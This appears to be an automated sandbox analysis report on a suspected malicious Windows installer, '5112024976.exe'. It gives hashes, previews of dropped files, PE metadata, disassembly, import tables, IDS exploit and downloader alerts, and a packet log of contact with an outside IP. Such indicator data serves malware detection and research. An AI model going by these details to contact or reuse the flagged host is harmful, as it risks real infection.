                                          MD5:3F176D1EE13B0D7D6BD92E1C7A0B9BAE
                                          SHA1:FE582246792774C2C9DD15639FFA0ACA90D6FD0B
                                          SHA-256:FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
                                          SHA-512:0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Joe Sandbox View:
                                          • Filename: Anfrage24438.zip, Detection: malicious, Browse
                                          • Filename: Anfrage24438.exe, Detection: malicious, Browse
                                          • Filename: Anfrage24438.exe, Detection: malicious, Browse
                                          • Filename: 21st OCTOBER 2024 234876sdf ORDER_PDF.exe, Detection: malicious, Browse
                                          • Filename: 21st OCTOBER 2024 234876sdf ORDER_PDF.exe, Detection: malicious, Browse
                                          • Filename: Purchase Order.exe, Detection: malicious, Browse
                                          • Filename: Documenti di spedizione.bat.exe, Detection: malicious, Browse
                                          • Filename: DHL AWB - COMMERCIAL INVOICE AND BL.exe, Detection: malicious, Browse
                                          Reputation:moderate, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....MX...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\5112024976.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):448073
                                          Entropy (8bit):1.2554221597008608
                                          Encrypted:false
                                          SSDEEP:1536:i9EUBeeNEu//hQg77ea6OP/B1p7to4APRUYZAkxe:qFZO5u/B1pBo510
                                          MD5:3AD8D5763CA124C7392D1F4F53D24F0E
                                          SHA1:17D48EF1AB8D52A31821A069C225D45201535899
                                          SHA-256:3965D74DBD296AA8E7524C773FE81FE63A78355145502153CB577E9CB136DDA0
                                          SHA-512:EE8BDE196A33297BFD4E51ED01E7D0178CF457497E822771D2BE3C58A97681AC52CD19A2BBBB71220F06F6D936A6AA67966295DF3C676104B9643F07CBE37EC8
                                          Malicious:false
                                          Reputation:low
                                          Preview:............y...k......... ....L..............................................................c....................d...........................p..............R.................................................5...............f.......{......................................................................................J...........@.................E....h...............0................M.................'..............................................-...............Z.........................{...............T............c.W..............n....................H...........................................|...................................^...........w.................c...............................).....................................y.....<.......................................T........................................................3.....S..<.......?........................................1!......^.............................t................................................G........
                                          Process:C:\Users\user\Desktop\5112024976.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):362911
                                          Entropy (8bit):1.2562704713226092
                                          Encrypted:false
                                          SSDEEP:768:uFKWW9YiDlIMhmjVacve6tEvHBLNB3tQsrTpPH8mZLAUFwsahGF48hDpWRcKthwz:u5W9yMJLNbJ1CbFV3Gd6Ie48dPs
                                          MD5:8AB9852274FA64E09B5711A2E7D94AAB
                                          SHA1:2C39272B969040B4C185EE4A69A5F04FD1F7C0DB
                                          SHA-256:FCD149788A3530E5E2CF5E17A09B1DE51EB67B51F3E8941E7091F88B610373F1
                                          SHA-512:6761208A22E8D93D70465E6DD9CF1B53826AA6BF0418DCCB0A6E5816A183790A61AD67EDCF52D21366975014701107563CE47A0465CEE801300493AEB566CC69
                                          Malicious:false
                                          Reputation:low
                                          Preview:....-......................................................................?d..........\.a.....................................8...............x...........e...................................)...............+..............................................i...................................................................................................................4......j................................................................................"......................................Z.....%...................................................................................................F............................................................................g...............................E./.....................................................................................Y........#.......F.......n.M.........................................................................................................................W..................................................
                                          Process:C:\Users\user\Desktop\5112024976.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):497
                                          Entropy (8bit):4.296439217688297
                                          Encrypted:false
                                          SSDEEP:12:kdESMQrs7ZnIyxrqlLIRF0+UAkN0lCGsMqejQlJ8:QjMfpIuqPAEsOi
                                          MD5:1560371431CEB91914AF5B9D0D307EE1
                                          SHA1:182B8979D4D0F9F26366653638A9C92FDAFF0D56
                                          SHA-256:72A2010CDB6ED407FCA17CDB181D5F01801F16040C2C9443BD7CB5032CDAAEF7
                                          SHA-512:865EF0F7636149A47043183583635C2A4306BF49565166760672B88F0F9DA89A529FE4166DFF496327304E56A8A460B8113E5F3D58601C0B8A3EFAABD792AF3D
                                          Malicious:false
                                          Reputation:low
                                          Preview:avenging piktogrammernes duecento korsedderkop skurvognsudlejningernes fnges ranaria..kavitet ubetalelige forhalingen passado nautically formaalsbestemmelsernes admiralsuniformers..franchot unimposing rimfire.bemba barsac unflaked skbnesvanger.tige backchats leveret viktualieforretningernes processal dignitas altica epoxyharpikset sergenter forureningsbegrnsedes..sforsvaret antiquating photomechanically enighedernes firepot megrez almon aeneus madrassen thrallborn denoteres slipup tvebakken..
                                          Process:C:\Users\user\Desktop\5112024976.exe
                                          File Type:Matlab v4 mat-file (little endian) Y, numeric, rows 0, columns 0
                                          Category:dropped
                                          Size (bytes):354845
                                          Entropy (8bit):1.2446363869824946
                                          Encrypted:false
                                          SSDEEP:768:E2oz5FNvncy2DZRau7W0sxOvPfSfpg5rWuWAAUIdde/FwPPMk/FOuyQv9biuPia6:opho02mYrKiKLFyJ1AIu2
                                          MD5:DF7A44909B03AB5BC45910B405D9977A
                                          SHA1:3D0583A7DFB39E559827189E02123F2C983A21D5
                                          SHA-256:5A3B61A0BC8E81E756374D2A9FF5087FA4496543A635738ACA8911E95D6340D9
                                          SHA-512:C2B4E951A185FC3FB75109B5CAA554431C1517588D04B8F2BA865F75BE448A0448364BCB84253C9B44579078787DDA616F33666C0C1BF902EC644EBC9A6FE621
                                          Malicious:false
                                          Reputation:low
                                          Preview:..................%.Y.............................[......................z...........................................8.................{................b.......W..........................................#.........................................%....z..................7......................................x.i...+............................................................................8......................................................................................................................-..3..................................................................................|............T...........................#...........\.....A.............................................7..........'.................... ...................].................J.J..........s................................g..............W........................................................................................................$...g..........................................................
                                          Process:C:\Users\user\Desktop\5112024976.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):298017
                                          Entropy (8bit):1.245520550165085
                                          Encrypted:false
                                          SSDEEP:768:nLoDoRi0SWvTrmnVqvh6dzfCaci65UhXqjMctTGA3QBgdRWqrw3q3LFPRvx7H155:DStBsLk6gsifeQIGA0iYRwvy8n
                                          MD5:B4C9FC75BAB8C9F006A7D9DDBC249F79
                                          SHA1:70D4047E7E3BB10CF237B82775C89A1D92700162
                                          SHA-256:1D84F9462C244A4500C213DF8DD79971B286392CA02BC536F5F6C3EEBC94E7E3
                                          SHA-512:2E2279CB3755AC5708ABB30E8342235B7F0A24223E3D6F4B2B21B62E59012A5126ADC1BD73D7B64E72634728DECCE7A049D3E6F5055F8D74E959BEE54EDBEA4C
                                          Malicious:false
                                          Preview:............................_..,...........................................................;...........................................................7...O..................'.........................................P.........L................@....................8....................v..................G.....h.............................................m..+b.....................................................m.......C.....................................i..........................................................................................,................................C..........a...........Y......,...........q....................................................................................................................................................................................................................p................S................L..........)..............................................kF........^........E.................................................
                                          Process:C:\Users\user\Desktop\5112024976.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):261232
                                          Entropy (8bit):7.810968945420994
                                          Encrypted:false
                                          SSDEEP:6144:vDkhdnD7WYytSgCASI9NIf5YNlu+NR7kEevILCPuBszWh:4hdD7WzFIfCldNRlewmPu+Wh
                                          MD5:4C5BCB1BCA0173E364739A5A6462787A
                                          SHA1:F60950A57F95159F4A88F029C1220B49F4B3CC1A
                                          SHA-256:3986B2BBB587E74E980664D721C60643E43BA328D48CD97D95BBF53C5B89F8B0
                                          SHA-512:D8C1361F014E9341A5BDFEDF55E07FE6749B059E2BDFED9A3415D70DE0A01FD08AC60755A10F9C31BCA93CA200CCBE176409162B924915047BD50297678E49C0
                                          Malicious:false
                                          Preview:...........;.rrr...............;;..NN...... ..... .l.WW.VV.......W..............+...n........................f...........FFF...|............qqqq....2222....aaaaaa........................000.......... .F....[............................E.Y........::.._.......l...........ee.....KK...;;;;..........*.)...TT.hh..m.............>>.......j.`.....,,.N......{...[[.......[[..ttttt...#.tt....00..........*.......___..........K................5.H.................66666...@.R.....................---.............R.K....----..||||||..M.........66.........11111....@@......D....)....}}}......?..mm........@.......vv............._......;...``.............................cc....g.9....:..EEEEE....777.......8.........7....IIII.}......ff....@@@..........s..................>>>.6.....0....~.R.....R....................4..............t....\\\...................................1...............xx..........P.........../......A........@.HHH.........jj.........&.jj..++++...uu..J..ZZ.....JJ............G....u......@@..
                                          Process:C:\Users\user\Desktop\5112024976.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):497497
                                          Entropy (8bit):1.2525295412969446
                                          Encrypted:false
                                          SSDEEP:1536:rbNZ/Rg8JCCgxT2eIgde/lBWTTBwGceukAdTYz91n6n:9NRg836IVLWHeGxKYQ
                                          MD5:F3F6C6E37EAB51D3B9B9C059C1EB874C
                                          SHA1:401E5740CCFBC1DA83BD9B426C11020C812986F2
                                          SHA-256:B5A607F50C65E41B2BFF7F852F27373177D326D9DFA1040E1C2B3AF62F757BAB
                                          SHA-512:060B328595ADAF9E85B390AA2AACEEFE4C6197294B7C45594798755C5E04BE1E2110F617B51E38D7DF423CD807FA81B30702CE2548563980B9CA195ECF2C11A7
                                          Malicious:false
                                          Preview:.........................................o................j........................................c..6......................................../....................................................m...............................r.D................................T.........................................................8....................x...................................................................!.....O....\................G.........................................G........n....."................:.........................................................................................................@.......<..................................................i.......k..............................................................................................................................=.........g.........................k.............A.......[........................)...........e................................b.............................................6.............
                                          Process:C:\Users\user\Desktop\5112024976.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):476422
                                          Entropy (8bit):1.2552031449987011
                                          Encrypted:false
                                          SSDEEP:1536:zGmPxn4XjZOVebnJjvYbTUBhGKcjnO/EeMHPm:Sm6zYVb849nH6
                                          MD5:F236A74F28F6F32F81F1347D9F129268
                                          SHA1:D5BE521661EE4BF3C186C3EAA0411DD5DF6F3EBA
                                          SHA-256:BEED12F00B12156FF9FA63595DE11A5C01493CF5F85488CB2E159CF1A8236778
                                          SHA-512:D6AD37DDF7B6B38B90F09186AC81C6A76F16F9A4613D6113F10D7B2A4F68129E570EFFC77A19B04F276277B7A569EBD5FD4A48D2E2E72CEA8CEE5A8F67CC5EF4
                                          Malicious:false
                                          Preview:.................................................................7...........................).....$....%..........................#.....M.....................................6.........N.........).......................................................................................a..............t..................................................T.........................................@...........................+..U...................A'..............L..................................................../.............2..............k.........................................................................................................&.............................................>...........................................................|..........................?...............................&...................................n.q......}....................................E......................................................p........................................6..........
                                          Process:C:\Users\user\Desktop\5112024976.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):58979
                                          Entropy (8bit):4.614558556395747
                                          Encrypted:false
                                          SSDEEP:768:L0NiORRuLZR6FX7cBR+8yf+GEpMu6pTwnhMPg8dK8Fml+72IvBgB:L0PqZsFrcBlytu6AUg8IjlPoy
                                          MD5:F94A1753D228E2F20927FD899344C13D
                                          SHA1:96A8A54D722CB98298CF690F4ACB6DA926989C32
                                          SHA-256:2D13F5835B398F13D5649811E771DB6FE06A9F0E5520A404C2A0F7E16F22FF73
                                          SHA-512:7E60C71842CB2917E6D2A99D7A7B2E96C08A6841B918E14BDDAC6BA36DC52D7E36F26EA1B25F709E60726FC5E07B420568F1A510F88CC3E9D8AB9C909C9FE766
                                          Malicious:false
                                          Preview:.............OO.`...D.....................oo.........+.........................J.....B........................................======.................ppp...........L...^.............w.............R.........OO..EE................GGG....................D.QQ..K.........YYYY.......4.:.......;;;...........{{...RR...~...........................333.......;.......==........................-.[...I.............RR....SSS...... ....._.......................].....O.............44.b.......@.*........................+...........................^^........................'...........{....??....99.............WW.rrr.......%.oo......PPPP..........$$$..'.yyy.b...aa..........g.66....77.B.......B..............,,.........tttttt.....q.b....L........GG..............l.<..............nnn.......{{................5............P.)......''''...........L...............................jjjjjj.........................................;......'................@@.........rr.......TT...WW..............GG.......hh....{......!
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.57034143564734
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:5112024976.exe
                                          File size:1'224'768 bytes
                                          MD5:35826e4e9e0db5ce7a5e95d34c34e2da
                                          SHA1:f2aea3002a1529f56ea66478789037440702dfbd
                                          SHA256:5a23c2b6db6ec6993f56e635a2958ed21bbf94c6920f2329fdcd9a8641ff9b6a
                                          SHA512:2ccfbcc70d12c89e6ee8d7bd50bd39cb5497f8a261ad6d80014f3bb89856b4cbef714de1a3ef9aef3e2cf885ab2efea42d84dc3075e31bdcf49b82d8cf0dc02a
                                          SSDEEP:24576:pCAoDyk/vnt3h1CzLuTIvVFALOOOPgMAO7w6/tJeuHdB4bU4VD4dmo:pCAfqvtx1UuTId0/YgMNf2uHHSU4VDU
                                          TLSH:9645124377660EA5D85D80F7D666CD316F63BC6B008106EB3648BB1A9FBA3E0412B53D
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...<.MX.................b...|.....
                                          Icon Hash:076d76bb4c713307
                                          Entrypoint:0x4031a3
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x584DCA3C [Sun Dec 11 21:50:52 2016 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                          Signature Valid:false
                                          Signature Issuer:CN=Thematically, O=Thematically, L=Alvord, C=US
                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                          Error Number:-2146762487
                                          Not Before, Not After
                                          • 20/09/2024 08:17:11 20/09/2027 08:17:11
                                          Subject Chain
                                          • CN=Thematically, O=Thematically, L=Alvord, C=US
                                          Version:3
                                          Thumbprint MD5:8E893E2C0D3E7EBBCE325F8CF2021265
                                          Thumbprint SHA-1:957C315F54630C0B32951BBBBA2D2A5D5A2370D4
                                          Thumbprint SHA-256:5B3F3E752B6C7E17B3684AA981E05D5F2505146C254F30FF48D48E70E3B7D7B3
                                          Serial:72FF3823130DEA295E2FABF3FD0B92EC3C0BF6AC
                                          Instruction
                                          sub esp, 00000184h
                                          push ebx
                                          push esi
                                          push edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+18h], ebx
                                          mov dword ptr [esp+10h], 0040A198h
                                          mov dword ptr [esp+20h], ebx
                                          mov byte ptr [esp+14h], 00000020h
                                          call dword ptr [004080A8h]
                                          call dword ptr [004080A4h]
                                          cmp ax, 00000006h
                                          je 00007F1C9080F1A3h
                                          push ebx
                                          call 00007F1C90812111h
                                          cmp eax, ebx
                                          je 00007F1C9080F199h
                                          push 00000C00h
                                          call eax
                                          mov esi, 00408298h
                                          push esi
                                          call 00007F1C9081208Dh
                                          push esi
                                          call dword ptr [004080A0h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], bl
                                          jne 00007F1C9080F17Dh
                                          push ebp
                                          push 00000009h
                                          call 00007F1C908120E4h
                                          push 00000007h
                                          call 00007F1C908120DDh
                                          mov dword ptr [0042F404h], eax
                                          call dword ptr [00408044h]
                                          push ebx
                                          call dword ptr [00408288h]
                                          mov dword ptr [0042F4B8h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+38h]
                                          push 00000160h
                                          push eax
                                          push ebx
                                          push 00429828h
                                          call dword ptr [00408174h]
                                          push 0040A188h
                                          push 0042EC00h
                                          call 00007F1C90811D07h
                                          call dword ptr [0040809Ch]
                                          mov ebp, 00435000h
                                          push eax
                                          push ebp
                                          call 00007F1C90811CF5h
                                          push ebx
                                          call dword ptr [00408154h]
                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85340xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x4b0000x64f00.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x128d700x22d0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x60710x620086ec2a2da0012903b23e33f511180572False0.6687659438775511data6.434342820031866IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x80000x13520x1400cd090b7c5bd9ae3da2a43d4f02ef98b7False0.4599609375data5.237297010093776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0xa0000x254f80x600e98382d1559cdefaafaf45200fe1faf0False0.4544270833333333data4.037252180314336IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .ndata0x300000x1b0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x4b0000x64f000x650004b35ddad0638afdc14d8651f31f9f72eFalse0.5893022896039604data6.144636705094013IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_BITMAP0x4b4000x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                          RT_ICON0x4b7680x4180cDevice independent bitmap graphic, 255 x 510 x 32, image size 260100EnglishUnited States0.5566530003727171
                                          RT_ICON0x8cf780x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.6340796167041287
                                          RT_ICON0x9d7a00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.6664652091654404
                                          RT_ICON0xa6c480x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.6956188001889466
                                          RT_ICON0xaae700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.6902489626556016
                                          RT_ICON0xad4180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.724437148217636
                                          RT_ICON0xae4c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.7479508196721312
                                          RT_ICON0xaee480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.799645390070922
                                          RT_DIALOG0xaf2b00x144dataEnglishUnited States0.5216049382716049
                                          RT_DIALOG0xaf3f80x13cdataEnglishUnited States0.5506329113924051
                                          RT_DIALOG0xaf5380x100dataEnglishUnited States0.5234375
                                          RT_DIALOG0xaf6380x11cdataEnglishUnited States0.6091549295774648
                                          RT_DIALOG0xaf7580xc4dataEnglishUnited States0.5918367346938775
                                          RT_DIALOG0xaf8200x60dataEnglishUnited States0.7291666666666666
                                          RT_GROUP_ICON0xaf8800x76dataEnglishUnited States0.7457627118644068
                                          RT_VERSION0xaf8f80x2c8dataEnglishUnited States0.5084269662921348
                                          RT_MANIFEST0xafbc00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                          DLLImport
                                          KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                          USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                          ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-11-06T13:49:05.625475+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.449736TCP
                                          2024-11-06T13:49:43.809344+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.449737TCP
                                          2024-11-06T13:50:07.225894+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449825188.40.95.144443TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 6, 2024 13:50:05.879123926 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:05.879215002 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:05.879302979 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:05.906163931 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:05.906197071 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:06.807070017 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:06.807141066 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:06.887486935 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:06.887510061 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:06.887834072 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:06.887887001 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:06.962910891 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.003329039 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.225966930 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.226002932 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.226089954 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.226123095 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.226136923 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.226169109 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.359791994 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.360002041 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.360882998 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.360965967 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.362493038 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.362561941 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.364053011 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.364130020 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.494323015 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.494463921 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.495491982 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.495570898 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.496164083 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.496280909 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.497057915 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.497143030 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.498084068 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.498157978 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.498931885 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.499003887 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.499510050 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.499592066 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.628612995 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.628746986 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.629582882 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.629657984 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.629934072 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.629998922 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.630460024 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.630521059 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.630700111 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.630764008 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.630984068 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.631046057 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.631556034 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.631627083 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.632206917 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.632262945 CET49825443192.168.2.4188.40.95.144
                                          Nov 6, 2024 13:50:07.633759022 CET44349825188.40.95.144192.168.2.4
                                          Nov 6, 2024 13:50:07.633824110 CET49825443192.168.2.4188.40.95.144
